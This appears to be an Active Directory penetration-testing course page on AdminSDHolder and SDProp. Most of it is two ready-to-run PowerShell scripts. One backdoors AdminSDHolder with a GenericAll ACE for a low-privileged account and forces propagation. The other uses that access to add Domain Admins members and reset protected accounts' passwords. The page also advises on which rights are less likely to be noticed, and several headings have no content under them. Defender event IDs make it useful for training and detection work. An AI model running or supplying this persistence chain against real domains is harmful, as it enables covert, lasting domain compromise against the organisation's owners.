8.7.1 - AdminSDHolder
AdminSDHolder
AdminSDHolder is an object located under the System container in AD (CN=AdminSDHolder,CN=System,<domain DN>). Its security descriptor is the template ACL for the high-privilege "protected groups" and for every member of those groups, such as:
- Domain Admins
- Enterprise Admins
- Schema Admins
- Backup Operators
- Server Operators
- and others (Administrators, Account Operators, Print Operators, Domain Controllers, Replicator, and the Administrator and krbtgt accounts)
A system process called SDProp (Security Descriptor Propagator) runs on the PDC emulator every 60 minutes by default (AdminSDProtectFrequency under the NTDS\Parameters registry key on the PDC). On each run it overwrites the ACL of every protected group and every member of those groups with the ACL of AdminSDHolder, disables ACL inheritance on them, and stamps the objects with adminCount=1.
🎯 Persistence Technique:
Granting permissions to a user on the AdminSDHolder object causes that permission to propagate to all protected groups and their members at the next SDProp run. Writing to AdminSDHolder itself already requires control of it (in practice, Domain Admin), so this is a persistence technique rather than a privilege-escalation path: a low-privileged account such as student1 keeps effective control over Domain Admins and every DA member for as long as the ACE exists, and any manual cleanup of the ACL on the group or its members is undone within the hour because SDProp re-applies the template. For defenders, a change to the AdminSDHolder ACL is visible as Event ID 5136 (directory service object modified) when object auditing is enabled, and the subsequent propagation onto protected accounts is logged on the PDC as Event ID 4780.
Example: grant FullControl (GenericAll) on AdminSDHolder to student1:
Alternative (RACE Toolkit):
🔍 Verifying Admin Rights:
Using PowerView:
Or using the AD module:
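The whole setup described above, from granting the ACE to forcing propagation and verifying it with both toolsets, as an added PowerShell example that is not part of the original page. It assumes PowerView (PowerSploit dev branch) sits in the current directory and is run from a session that already holds Domain Admin rights; the domain DN is read from RootDSE rather than hard-coded, and 'student1' is the target account named on the page.

```powershell
# Added example, not from the original page. Assumes PowerView is in the
# current directory and the session already has Domain Admin rights.
. .\PowerView.ps1

# Derive the AdminSDHolder DN from the current domain instead of hard-coding it.
$domainDN      = "$(([ADSI]'LDAP://RootDSE').defaultNamingContext)"
$adminSDHolder = "CN=AdminSDHolder,CN=System,$domainDN"
$student1Sid   = ConvertTo-SID -ObjectName 'student1'   # PowerView: name -> SID string

# 1. Persistence: add a GenericAll (FullControl) ACE for student1 on AdminSDHolder.
Add-DomainObjectAcl -TargetIdentity $adminSDHolder -PrincipalIdentity 'student1' -Rights All -Verbose

# 2. Do not wait up to 60 minutes: ask the PDC emulator to run SDProp now by
#    writing the RunProtectAdminGroups operational attribute to its RootDSE
#    (Server 2008 and later; Nishang's Invoke-SDPropagator does the same write).
#    The write must go to the PDC emulator, other DCs ignore it.
$pdc     = (Get-Domain).PdcRoleOwner.Name
$rootDse = [ADSI]"LDAP://$pdc/RootDSE"
$rootDse.Put('RunProtectAdminGroups', 1)
$rootDse.SetInfo()

# 3a. Verify with PowerView: the ACE must exist on AdminSDHolder itself and,
#     after propagation, on the protected groups (Domain Admins shown here).
foreach ($target in $adminSDHolder, 'Domain Admins') {
    Get-DomainObjectAcl -Identity $target -ResolveGUIDs |
        Where-Object { "$($_.SecurityIdentifier)" -eq $student1Sid } |
        Select-Object ObjectDN, ActiveDirectoryRights, AceType
}

# 3b. The same check with the ActiveDirectory module and its AD: PSDrive.
Import-Module ActiveDirectory
foreach ($dn in $adminSDHolder, "CN=Domain Admins,CN=Users,$domainDN") {
    (Get-Acl -Path "AD:\$dn").Access |
        Where-Object { $_.IdentityReference -match 'student1' } |
        Select-Object @{ n = 'Object'; e = { $dn } }, IdentityReference,
                      ActiveDirectoryRights, AccessControlType
}

# Accounts that received the template carry adminCount=1; a defender hunting
# for this technique starts from the same query.
Get-DomainUser -AdminCount | Select-Object samaccountname, admincount
```

If the PowerView check on Domain Admins returns nothing while the check on AdminSDHolder succeeds, SDProp has not run yet: either the RootDSE write did not reach the PDC emulator or the default 60-minute interval has not elapsed.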
Abusing AdminSDHolder Permissions
Once SDProp has copied the ACE onto the protected objects, student1 exercises it directly against those objects, without touching AdminSDHolder again:
- Add a member to the Domain Admins group (if you have FullControl on the group)
- Reset the password of a protected account, including existing DA members (if the ResetPassword right is granted)
- Write group membership (if the WriteMembers right is granted)
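The abuse steps above, as an added PowerShell example that is not part of the original page. It runs as student1 after SDProp has propagated the ACE, assumes PowerView is in the current directory, and uses 'testda' as an assumed name for an existing, otherwise unprivileged domain user; the password value is likewise an assumption.

```powershell
# Added example, not from the original page. Run in a session as student1
# once the AdminSDHolder ACE has been propagated to the protected objects.
. .\PowerView.ps1

# FullControl (GenericAll) or WriteMembers on Domain Admins: add a member.
# 'testda' is an assumed existing user.
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'testda' -Verbose

# Confirm the membership change. testda only gets the new group SID in its
# token at the next logon, so a fresh session is needed before using it.
Get-DomainGroupMember -Identity 'Domain Admins' |
    Select-Object GroupName, MemberName, MemberSID

# ResetPassword (User-Force-Change-Password) on a protected account: set a
# new password without knowing the old one. Because every DA member carries
# the same propagated ACL, this works against existing admins as well.
$newPassword = ConvertTo-SecureString 'Password@123' -AsPlainText -Force   # assumed value
Set-DomainUserPassword -Identity 'testda' -AccountPassword $newPassword -Verbose

# The same propagated rights let student1 put the group back to its previous
# state, which matters if the goal is quiet persistence rather than a new DA.
Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'testda' -Verbose
```

The membership step is the one defenders notice first (Event ID 4728/4756 for a member added to a security-enabled group), while a password reset on an existing DA member (Event ID 4724) is easier to miss; which right to exercise depends on how long the access needs to stay unnoticed.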
Labs